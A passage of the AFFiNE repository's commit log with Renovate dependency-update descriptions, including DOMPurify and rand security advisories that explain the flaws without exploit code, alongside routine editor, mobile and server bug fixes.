([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

###
[`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0600-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-socket.io)</summary>

###
[`v0.62.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0620-2026-04-17)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/ed97091c9890dd18e52759f2ea98e9d7593b3ae4...bd017c86bcdf369d7bc1b490e455f95b25385779)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3479](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3479))
([8891261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/8891261cb590efcb661bd9f8afec4d1adf885ad8))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.61.0 to ^0.62.0

###
[`v0.61.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0610-2026-03-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/39f08c313dc4d929c110ab7c43771c3cdbf8aa4c...ed97091c9890dd18e52759f2ea98e9d7593b3ae4)

##### Features

- **deps:** update deps matching '@&#8203;opentelemetry/\*'
([#&#8203;3450](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3450))
([c8df394](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c8df394f02d68ae48a79a50258682c09dac13b8b))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
-
[@&#8203;opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils)
bumped from ^0.60.0 to ^0.61.0

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-19 16:20:32 +08:00
Whitewater 3428ac478e chore: split i18n and bs-docs dirty checks in typecheck workflow (#14849)
## Summary

Split generated-file validation in the `typecheck` workflow so i18n
outputs and BS docs outputs are checked separately.

This fixes a misleading CI failure message: previously, CI could fail
due to i18n-generated changes like
`packages/frontend/i18n/src/i18n.gen.ts`, but only suggested running
`yarn typecheck && yarn affine bs-docs build`, which does not regenerate
those files.

## Changes

- validate i18n-generated changes immediately after `yarn affine
@affine/i18n build`
- keep ignoring `packages/frontend/i18n/src/i18n-completenesses.json` in
CI as before
- leave `yarn typecheck` as a separate step
- make the BS docs step only check for changes introduced by `yarn
affine bs-docs build`

## Result

CI now gives the correct remediation command depending on which
generated files are out of date:
- i18n issues: `yarn affine @affine/i18n build`
- docs/typecheck issues: `yarn typecheck && yarn affine bs-docs build`

## Testing

- verified the updated workflow YAML parses successfully


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
* Enhanced build validation for internationalization code generation to
ensure generated changes are properly committed before proceeding. The
validation now occurs immediately after code generation runs, providing
faster feedback during the build process.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-19 02:12:00 +08:00
Saurabh Pardeshi 0009f91d2a feat(editor): add "Copy as Markdown" option in context & export menus (#14705)
- Allow users to select text and copy it as Markdown via the context
menu
- Add "Copy as Markdown" under Export menu to copy entire document to
clipboard

Fixes #12983

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Added "Copy as Markdown" to the toolbar clipboard More menu for
selected content.
* Added "Copy as Markdown" to the page export menu to copy entire pages
as Markdown.

* **Behavior**
* Export flow now returns success/failure so the UI shows a dedicated
success or error notification for clipboard exports.

* **Localization**
  * Added strings for "Copy as Markdown" and "Copied as Markdown".
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: Whitewater <me@waterwater.moe>
Co-authored-by: lawvs <18554747+lawvs@users.noreply.github.com>
2026-04-18 20:39:20 +08:00
renovate[bot] f7d0f1d5ae chore: bump up Node.js to v22.22.2 (#14836)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
| [node](https://nodejs.org)
([source](https://redirect.github.com/nodejs/node)) | patch | `22.22.1`
→ `22.22.2` |

---

### Release Notes

<details>
<summary>nodejs/node (node)</summary>

###
[`v22.22.2`](https://redirect.github.com/nodejs/node/compare/v22.22.1...v22.22.2)

[Compare
Source](https://redirect.github.com/nodejs/node/compare/v22.22.1...v22.22.2)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjMuOCIsInVwZGF0ZWRJblZlciI6IjQzLjEyMy44IiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-17 23:59:24 +08:00
renovate[bot] 0849b342fa chore: bump up dompurify version to v3.4.0 [SECURITY] (#14833)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [dompurify](https://redirect.github.com/cure53/DOMPurify) | [`3.3.3` →
`3.4.0`](https://renovatebot.com/diffs/npm/dompurify/3.3.3/3.4.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/dompurify/3.4.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/dompurify/3.3.3/3.4.0?slim=true)
|

### GitHub Vulnerability Alerts

####
[GHSA-39q2-94rc-95cp](https://redirect.github.com/cure53/DOMPurify/security/advisories/GHSA-39q2-94rc-95cp)

## Summary
In `src/purify.ts:1117-1123`, `ADD_TAGS` as a function (via
`EXTRA_ELEMENT_HANDLING.tagCheck`) bypasses `FORBID_TAGS` due to
short-circuit evaluation.

The condition:
```
!(tagCheck(tagName)) && (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName])
```
When `tagCheck(tagName)` returns `true`, the entire condition is `false`
and the element is kept — `FORBID_TAGS[tagName]` is never evaluated.

## Inconsistency
This contradicts the attribute-side pattern at line 1214 where
`FORBID_ATTR` explicitly wins first:
```
if (FORBID_ATTR[lcName]) { continue; }
```
For tags, FORBID should also take precedence over ADD.

## Impact
Applications using both `ADD_TAGS` as a function and `FORBID_TAGS`
simultaneously get unexpected behavior — forbidden tags are allowed
through. Config-dependent but a genuine logic inconsistency.

## Suggested Fix
Check `FORBID_TAGS` before `tagCheck`:
```
if (FORBID_TAGS[tagName]) { /* remove */ }
else if (tagCheck(tagName) || ALLOWED_TAGS[tagName]) { /* keep */ }
```

## Affected Version
v3.3.3 (commit 883ac15)

##### Severity
- CVSS Score: 5.3 / 10 (Medium)
- Vector String:
`CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N`

---

### Release Notes

<details>
<summary>cure53/DOMPurify (dompurify)</summary>

###
[`v3.4.0`](https://redirect.github.com/cure53/DOMPurify/releases/tag/3.4.0):
DOMPurify 3.4.0

[Compare
Source](https://redirect.github.com/cure53/DOMPurify/compare/3.3.3...3.4.0)

**Most relevant changes:**

- Fixed a problem with `FORBID_TAGS` not winning over `ADD_TAGS`, thanks
[@&#8203;kodareef5](https://redirect.github.com/kodareef5)
- Fixed several minor problems and typos regarding MathML attributes,
thanks [@&#8203;DavidOliver](https://redirect.github.com/DavidOliver)
- Fixed `ADD_ATTR`/`ADD_TAGS` function leaking into subsequent
array-based calls, thanks
[@&#8203;1Jesper1](https://redirect.github.com/1Jesper1)
- Fixed a missing `SAFE_FOR_TEMPLATES` scrub in `RETURN_DOM` path,
thanks [@&#8203;bencalif](https://redirect.github.com/bencalif)
- Fixed a prototype pollution via `CUSTOM_ELEMENT_HANDLING`, thanks
[@&#8203;trace37labs](https://redirect.github.com/trace37labs)
- Fixed an issue with `ADD_TAGS` function form bypassing `FORBID_TAGS`,
thanks [@&#8203;eddieran](https://redirect.github.com/eddieran)
- Fixed an issue with `ADD_ATTR` predicates skipping URI validation,
thanks [@&#8203;christos-eth](https://redirect.github.com/christos-eth)
- Fixed an issue with `USE_PROFILES` prototype pollution, thanks
[@&#8203;christos-eth](https://redirect.github.com/christos-eth)
- Fixed an issue leading to possible mXSS via Re-Contextualization,
thanks
[@&#8203;researchatfluidattacks](https://redirect.github.com/researchatfluidattacks)
and others
- Fixed a problem with the type dentition patcher after Node version
bump
- Fixed freezing BS runs by reducing the tested browsers array
- Bumped several dependencies where possible
- Added needed files for OpenSSF scorecard checks

**Published Advisories are here:**

<https://github.com/cure53/DOMPurify/security/advisories?state=published>

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjAuMiIsInVwZGF0ZWRJblZlciI6IjQzLjEyMC4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-16 19:53:00 +08:00
renovate[bot] dc3b95c886 chore: bump up Rust crate rand to v0.9.3 [SECURITY] (#14832)
This PR contains the following updates:

| Package | Type | Update | Change |
|---|---|---|---|
| [rand](https://rust-random.github.io/book)
([source](https://redirect.github.com/rust-random/rand)) | dependencies
| patch | `0.9.1` → `0.9.3` |
| [rand](https://rust-random.github.io/book)
([source](https://redirect.github.com/rust-random/rand)) |
workspace.dependencies | patch | `0.9.2` → `0.9.3` |

### GitHub Vulnerability Alerts

####
[GHSA-cq8v-f236-94qc](https://redirect.github.com/rust-random/rand/pull/1763)

It has been reported (by @&#8203;lopopolo) that the `rand` library is
[unsound](https://rust-lang.github.io/unsafe-code-guidelines/glossary.html#soundness-of-code--of-a-library)
(i.e. that safe code using the public API can cause Undefined Behaviour)
when all the following conditions are met:

- The `log` and `thread_rng` features are enabled
- A [custom
logger](https://docs.rs/log/latest/log/#implementing-a-logger) is
defined
- The custom logger accesses `rand::rng()` (previously
`rand::thread_rng()`) and calls any `TryRng` (previously `RngCore`)
methods on `ThreadRng`
- The `ThreadRng` (attempts to) reseed while called from the custom
logger (this happens every 64 kB of generated data)
- Trace-level logging is enabled or warn-level logging is enabled and
the random source (the `getrandom` crate) is unable to provide a new
seed

`TryRng` (previously `RngCore`) methods for `ThreadRng` use `unsafe`
code to cast `*mut BlockRng<ReseedingCore>` to `&mut
BlockRng<ReseedingCore>`. When all the above conditions are met this
results in an aliased mutable reference, violating the Stacked Borrows
rules. Miri is able to detect this violation in sample code. Since
construction of [aliased mutable references is Undefined
Behaviour](https://doc.rust-lang.org/stable/nomicon/references.html),
the behaviour of optimized builds is hard to predict.

Affected versions of `rand` are `>= 0.7, < 0.9.3` and `0.10.0`.

##### Severity
Low

---

### Release Notes

<details>
<summary>rust-random/rand (rand)</summary>

###
[`v0.9.3`](https://redirect.github.com/rust-random/rand/compare/0.9.2...0.9.3)

[Compare
Source](https://redirect.github.com/rust-random/rand/compare/0.9.2...0.9.3)

###
[`v0.9.2`](https://redirect.github.com/rust-random/rand/blob/HEAD/CHANGELOG.md#092---2025-07-20)

[Compare
Source](https://redirect.github.com/rust-random/rand/compare/0.9.1...0.9.2)

##### Deprecated

- Deprecate `rand::rngs::mock` module and `StepRng` generator
([#&#8203;1634](https://redirect.github.com/rust-random/rand/issues/1634))

##### Additions

- Enable `WeightedIndex<usize>` (de)serialization
([#&#8203;1646](https://redirect.github.com/rust-random/rand/issues/1646))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - ""
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about these
updates again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xMjAuMiIsInVwZGF0ZWRJblZlciI6IjQzLjEyMC4yIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-04-16 19:52:25 +08:00
Abdul Rehman 1d66e7e8ca fix(editor): allow hyperlink clicks in locked edgeless text blocks (#14829)
Fixes #14673

## Summary

When an edgeless text block is locked, `pointer-events: none` on the
inner content div (`edgeless-text-block.ts:308`) blocks all mouse
interaction — including clicking hyperlinks. Locking is intended to
prevent accidental edits, not to block navigation, so links should
remain clickable.

## Fix

Apply a `locked-content` class on the inner div when the block is locked
and not being edited, and add a targeted CSS rule restoring
`pointer-events: auto` on anchor elements within locked content.

## Context

Re-implements the fix from PR #14692 (authored by @moktamd, reverted per
@darkskygit's comment on #14673 because the original contributor had not
signed the CLA). The CLA is signed for this PR.

## Test plan

- [ ] On edgeless canvas, create a text block with a hyperlink (e.g.
`[link](https://affine.pro)`)
- [ ] Lock the block via the shape toolbar
- [ ] Hover the link → cursor shows pointer
- [ ] Click the link → navigation occurs
- [ ] Unlock and confirm editing still works as before

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Links within locked text blocks are now interactive and clickable with
proper visual cursor feedback.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-15 17:31:48 +08:00
Hana B c5b0057778 fix(core): resolve remaining untranslated doc title case in detail page header (#14820)
fix #14735

This PR fixes a remaining desktop case related to #14467.

The previous fix resolved incorrect translation in navigation panels,
but the detail page header tab title was still passing custom document
titles through `i18n.t()`, causing user-defined titles to be
unexpectedly translated.

### Results


https://github.com/user-attachments/assets/4abad3b9-d5d7-442f-b643-6d9ea63fa741

After:
<img width="2100" height="1722" alt="After"
src="https://github.com/user-attachments/assets/0770eae2-e5c5-4816-8d53-e40a4b52800c"
/>

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Refactor**
* Updated page title retrieval mechanism in workspace detail page
headers. The title is now sourced directly from the document display
metadata service instead of using the previous derivation method.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-15 14:49:41 +08:00
DarkSky a109f069b0 chore: bump deps 2026-04-10 11:46:14 +08:00
DarkSky 0b4d25f332 chore: improve test stability 2026-04-09 13:11:36 +08:00
DarkSky c6a99eb9cb chore: bump deps (#14810)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Chores**
* Updated developer tooling dependencies used for local testing to newer
patch versions for improved stability.
* Bumped backend framework and related packages to newer patch releases
to address fixes and maintain compatibility.
* No functional or public API changes; updates are non-breaking
dependency version bumps.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-09 12:41:38 +08:00
DarkSky 77657a697b feat(mobile): improve notify for login failed 2026-04-09 11:35:15 +08:00
gogo199432 eb953c0565 fix(android): route OAuth deep link to correct server's AuthService (#14809)
Porting over iOS fix for self-hosted SSO to Android from #11563.

Fixes #12819

Tested on own instance using Authentik.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Android authentication now supports an optional server parameter in
the callback URL, enabling sign-in against different server instances.
* If the specified server cannot be found, the authentication attempt is
halted and an error is reported.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: coderabbitai[bot] <136622811+coderabbitai[bot]@users.noreply.github.com>
2026-04-09 11:30:34 +08:00
Cats Juice 77c0b2ef47 fix: prevent IME preedit overflow in mind map node editor (#14520)
## Summary

Update the edgeless shape text editor to resize mind map node text
bounds while IME composition is in progress.

## Changes

- listen to `compositionupdate` on the inline editor container
- trigger `_updateElementWH()` on `compositionupdate` and
`compositionend`
- keep text box dimensions in sync before composition is committed

## Testing

- Not run locally: `pnpm` is not available in this environment, so
package build/tests could not be executed here.

Fixes #11515


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Editor mounting tolerates missing/null elements and validates input to
avoid errors.
* Text creation/update consistently targets the refreshed element to
prevent mismatches.
* Inline editor listens for IME composition events and schedules
layout/size recalculation (with proper cleanup) so sizing stays in sync.

* **Tests**
* Added an integration test verifying layout/size updates during IME
composition events.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-04-09 11:25:55 +08:00
DarkSky 7138fea9db fix: test stability 2026-04-09 11:21:25 +08:00
Ahsan Khaleeq 156cfc7e76 fix(core): improve table header sorting logic in processTable function (#14797)
Bug Resolved
#14795


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Made row and column sorting deterministic when items share the same
order value, reducing unexpected cell shifts.
* Adjusted comparator behavior to preserve tied-order grouping, which
may change displayed column/row sequence in edge cases.
* Improved consistency of table rendering and cell placement across
refreshes and edits.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-06 19:33:53 +00:00
Whitewater 2ca4973167 fix(editor): make repeated "Cancel line number" clicks work in code blocks (#14804)
Fixes #13555


https://github.com/user-attachments/assets/12e55c21-080c-4c69-9780-893ccad25b45

## Summary
- make the code block More popup reactive to `wrap` and `lineNumber`
prop updates
- read the latest toggle state at click time so same-menu double toggles
do not reuse stale closures
- add e2e coverage for wrap and line number toggling twice without
closing the More menu

## Bug Reason
- the code block More popup was rendered as a static portal, so it
stayed open without re-rendering after the first toggle
- the `Cancel line number` and `Wrap` menu actions captured render-time
state in their click handlers
- after the first click updated the model, a second click in the same
open menu reused stale state and wrote the same value again, so nothing
changed visually

## Testing
- yarn workspace @affine-test/blocksuite test e2e/code/crud.spec.ts

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Menu toggles now read and update the current wrap and line-number
states reliably.

* **Refactor**
* Replaced inline popup rendering with a dedicated more-menu component
for the code toolbar.

* **Style**
* Prevented text selection on menu action elements for smoother
interaction.

* **Tests**
  * Added e2e tests for wrap and line-number toggle flows.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-06 19:18:15 +00:00
DarkSky a1ae7d11a3 feat(core): add integration panel test 2026-04-07 02:12:02 +08:00
Jasper Zeng f41bc2d5c3 fix(editor): restore grouped manual ordering for kanban and arrange (#14630)
Fixes #14531, where mannual vertical order is broken [Root
Cause](https://github.com/toeverything/AFFiNE/issues/14531#issuecomment-4052422436)

- Restored manual row/card sorting when building grouped kanban data.
- Reapplied `sortRow(...)` to each group before rendering `group.rows`.
- Fixed group/board arrange to reorder from the full group list,
including hidden or empty groups.
- Preserved consistent ordering between the settings panel and persisted
`groupProperties`.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
* Consolidated internal grouping and sorting logic to ensure consistent
ordering across grouped views; visible behavior unchanged.
* Moving groups or cards now uses a single, consistent ordering approach
to avoid intermittent ordering differences.
* **Tests**
* Added tests to verify manual per-group card order is applied and
preserved when moving cards between groups.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-04-07 02:09:05 +08:00
chauhan_s e3391c0577 feat: redirect account click & OAuth to Calendar settings (#14693)
### PR Description

* clicking a linked calendar account now switches settings to Workspace
Integrations and opens the Calendar settings directly
* calendar OAuth returns now land on Workspace Integrations with the
Calendar settings opened instead of the homepage
* Improves UX by reducing friction when managing calendar integrations

https://www.loom.com/share/49fa5c448ce049659877beb42d7bd81a


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Calendar integration settings can now be opened automatically
(including from OAuth redirects) and workspace settings support a
scroll-to-anchor.
* Integration account rows are now clickable for quick access to
settings.

* **Improvements**
* Enhanced visual feedback with interactive hover and focus states for
integration controls.

* **Tests**
* Added tests covering the OAuth redirect behavior and workspace
settings scroll/open handling.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <darksky2048@gmail.com>
2026-04-07 02:08:36 +08:00
DarkSky 5806ad8a3a fix(server): online and storage statistics (#14792)
#### PR Dependency Tree


* **PR #14792** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Admin dashboard returns more accurate sync and storage timelines with
carry‑forwarded minute buckets and corrected current totals.

* **Bug Fixes**
* Active-user flushes are debounced/scheduled to prevent overlapping
writes and reduce stale counts.
* Snapshot writes now retry and will skip gracefully when lock
contention prevents completion, avoiding partial snapshots.

* **Tests**
* New e2e tests cover carry‑forward behavior, no backfill outside
requested windows, and storage history accuracy.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-07 02:08:13 +08:00
DarkSky 193ec14ad3 feat(server): synthetic root doc (#14794) 2026-04-06 17:16:34 +08:00
DarkSky 64149d909a feat: follow publish mode if no params 2026-04-05 20:43:09 +08:00
chauhan_s f81abe692d fix(core): shared page mode syncing (#14756)
### Summary
This fixes a few inconsistencies in shared page behavior:
fixes https://github.com/toeverything/AFFiNE/issues/14751
- shared pages now open in the correct published mode when the URL does
not already include ?mode=...
- switching between page and edgeless in shared mode now keeps the URL
query param in sync
- the default Copy Link action now follows the current editor mode
- shared viewers can toggle between page and edgeless mode in readonly
share pages

---

### What Changed
- updated shared page mode resolution to prefer URL mode, with backend
publish mode as fallback
- added query-param syncing for shared page mode changes
- made the default share link copy use:
  - page link in page mode
  - edgeless link in edgeless mode
- allowed EditorModeSwitch to toggle both ways in shared mode
- extracted shared-mode behavior into small hooks to keep share-page.tsx
cleaner

---

### Demo

https://www.loom.com/share/a287172321fb4fc5b94f7c67a39298a9


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Mode switching between page and edgeless no longer blocked by shared
gating; shared pages initialize and respect the resolved editor mode.
* Shared page URLs stay in sync with editor mode and copy-link actions
include/preserve the selected mode.

* **Tests**
* Added tests for publish-mode resolution, query-string mode handling,
and default share-mode behavior.

* **Bug Fixes**
  * Updated shared-page “not found” UI text to match new messaging.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2026-04-05 20:20:58 +08:00
Xuan4781 aa48c1c18b fix: audio waveform clipping in horizontal card view (#14789)
Fixes #13399

### Issue
When viewing an audio attachment card in horizontal view, the waveform 
was being clipped and not fully visible. In vertical view it displayed 
correctly.

### Fix
- `audio-waveform` and `progressContainer` flex children were missing 
  `minWidth: 0` and `flex: 1`, causing container overflow
- `.affine-attachment-container` had a fixed height with `overflow:
hidden`
  that cut off the waveform row

### Screenshot Verification
**Before**
<img width="1661" height="935" alt="image"
src="https://github.com/user-attachments/assets/b2f0908b-94fe-4869-bdfb-cc6a757e703d"
/>

**After**
<img width="750" height="182" alt="image"
src="https://github.com/user-attachments/assets/63caac69-f37b-4894-80de-806b691581c8"
/>


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

**New Features**
- Introduced audio embed card functionality allowing users to embed and
display audio content directly in documents with standardized dimensions
and improved responsive layout styling for better visual presentation
and integration.

**Improvements**
- Enhanced styling and layout handling for audio player components to
ensure proper display and optimal rendering in various container sizes
and space constraints.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 17:35:39 +08:00
Ahsan Khaleeq 3219b82827 fix(core): hotkey option+cmd+c for Code Block (#14790)
This PR fixes #14755 bug

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Bug Fixes**
* Fixed keyboard shortcut handling to properly distinguish between
locale input characters and actual shortcuts when using Alt+Meta key
combinations.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 17:21:23 +08:00
DarkSky b0cc2fd389 feat(editor): improve dated doc creation (#14791)
#### PR Dependency Tree


* **PR #14791** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)
2026-04-05 17:16:31 +08:00
chauhan_s 558400b7db feat: add auto-date titles for new documents (#14716)
## Summary

Adds an Editor setting to automatically title blank new documents with
the current date.
fixes https://github.com/toeverything/AFFiNE/issues/14709
https://www.loom.com/share/953b4eafcfb247839e977dca6f457229

## What Changed

- Added `Auto-title new docs with current date` under Editor settings
- Added `New doc date format`, shown only when auto-title is enabled
- Supported formats:
  - `DD-MM-YYYY`
  - `MM-DD-YYYY`
  - `YYYY-MM-DD`
  - `Journal style (localized)`
- Kept titles unique by appending duplicate-style suffixes:
  - `2026-03-24`
  - `2026-03-24(2)`
  - `2026-03-24(3)`

## Behavior

- Only applies to blank new docs
- Does not override explicitly provided titles
- Uses the existing journal-style localized formatter for the localized
option

## Implementation Notes

- Extended editor setting schema with:
  - `autoTitleNewDocWithCurrentDate`
  - `newDocDateTitleFormat`
- Added a helper for generating unique date-based titles
- Wired title generation into doc creation middleware
- Synced created titles into doc metadata so uniqueness works
consistently

## Tests

- Added unit coverage for:
  - date title formatting
  - duplicate suffix generation
  - doc creation middleware behavior
  - settings UI behavior


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* General settings: toggle to auto-insert current date into new document
titles; selectable formats: DD-MM-YYYY, MM-DD-YYYY, YYYY-MM-DD, and
localized "journal". Date-format chooser appears only when enabled.

* **Behavior**
* Blank new-docs are auto-populated per chosen format; user-provided
titles are preserved. Auto-generated titles avoid collisions by
appending incrementing suffixes.

* **Localization**
* Added translations for the setting, description, format chooser, and
all format labels.

* **Tests**
* Added UI and unit tests covering formatting, uniqueness, middleware
behavior, and interaction.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 17:10:01 +08:00
DarkSky fc5329a1be fix(server): skip watch for external cal (#14788)
#### PR Dependency Tree


* **PR #14788** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
* Calendar subscriptions now gracefully fall back to polling when push
notifications aren’t supported, keeping syncs working.
* Affected subscriptions have webhook details cleared and are marked
with a long-lived expiration to avoid repeated webhook attempts.
* Prevents repeated retries for unsupported push channels, reducing
unnecessary errors and retries.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-04-05 16:47:25 +08:00
DarkSky 547ab47a5e chore: improve ci (#14787) 2026-04-05 13:59:32 +08:00
DarkSky fee0cfa3f4 chore: bump deps (#14785)
